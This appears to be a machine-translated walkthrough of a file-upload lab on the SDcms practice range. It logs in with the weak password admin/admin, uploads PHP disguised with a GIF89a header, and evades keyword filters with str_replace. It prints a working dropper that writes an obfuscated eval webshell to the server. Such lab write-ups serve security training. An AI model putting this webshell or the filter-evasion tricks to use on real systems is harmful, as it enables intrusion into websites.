Article directory
Preface
This time we practiced at the SDcms shooting range, which is a series of file upload vulnerability shooting ranges. The shooting ranges are as follows:
1. Find the website backend page
1. Click to log in to view the URL
As shown in the figure, the login page parameter is?m=login
2. Modify the URL parameters and find the backend login page
Try changing the login parameter of the above URL to admin, as shown below, and the entry is successful.
2. Log in to the backend management system
1. Explosion cannot be used
The first reaction here was to use account and password blasting, and found that there are restrictions on accessed IPs. Once the number of incorrect accesses is exceeded, login will be restricted. The picture is as follows:
2. Log in using a weak password
Use the account password admin/admin to log in to the website backend
3. Find the file upload point
Find the file upload point as shown in the picture
4. Upload file operation
1. Upload ordinary image files and view the data package
Find the path to upload the file as shown in the figure: /upfile/2023/09/
2. Try to upload the PHP file
Change .jpg to .php in Burp, then add the GIF89a header to the file content, and find that the php file can be uploaded successfully.
Attempt to access the uploaded PHP file
. Access successful.
3. Upload the phpinfo() function to obtain system version information
It is found that the upload failed, which means that there is filtering here, and the phpinfo function is filtered.
4. Bypass filtering
Use str_replace function to bypass filtering, the method is as follows:
Bypass successful
Open the web page to view
如下是绕过代码:
<?php
$a = str_replace("0","","p0h0p0i0n0f0o");
$a();
?>
5. Try to upload webshell
1. Notes on PHP version
As can be seen from the above, the PHP version used by the shooting range is 7.4.3. This version cannot use the assert() function, so you can only use eval to get the shell, but eval cannot take effect using the str_replace method above.
I thought of a method. Since eval cannot be bypassed using the str_replace method, why don't I use PHP common files to create shell files by running ordinary files?
2. Try to create a file in the upper directory
As shown below, it was found that the upload failed
. After testing, it was found that the fopen() function and the file_put_contents() function were also filtered. There was no other way, so we bypassed these two functions. The method is as follows:
Then use a browser to open the uploaded PHP file, let the file run, and then check whether the superior has generated the shell.php file. If the
access is successful, this means that the shell.php file is successfully generated.
3. Write to shell
Replace the $data parameter inside with shell.
I found that the eval keyword can still be detected in this way. But it doesn’t matter, this is just a string. We only need to split the $data content into two parts centered on eval, and then merge them again.
4. Test shell
Open the uploaded PHP file using a browser and let it run
Then use the webshell tool to connect and test
the connection successfully!
编写后的绕过代码:
GIF89a
<?php
$filename = "../shell.php";
$data1 = '<?php class ok{var $arg;function setarg($x){$this->arg = "".$x.null;return $this->arg;}function setarg1($x){$this->arg = "".$this->setarg($x).null;}function go(){ev';
$data2 = 'al("$this->arg");}}$arr = array($_POST["x"]);$run = new ok;$run->setarg1($arr[0]);$run->go(); ?>';
$data = $data1.$data2;
$a = "f0o0p0e0n";
$open = str_replace("0","",$a);
$file = $open($filename,"w");
$b = "f0i0l0e_p0u0t_contents";
$write = str_replace("0","",$b);
$write($filename, $data);
fclose($file);
?>
Note: The shell here needs to use POST, and you cannot connect using GET Ant Sword.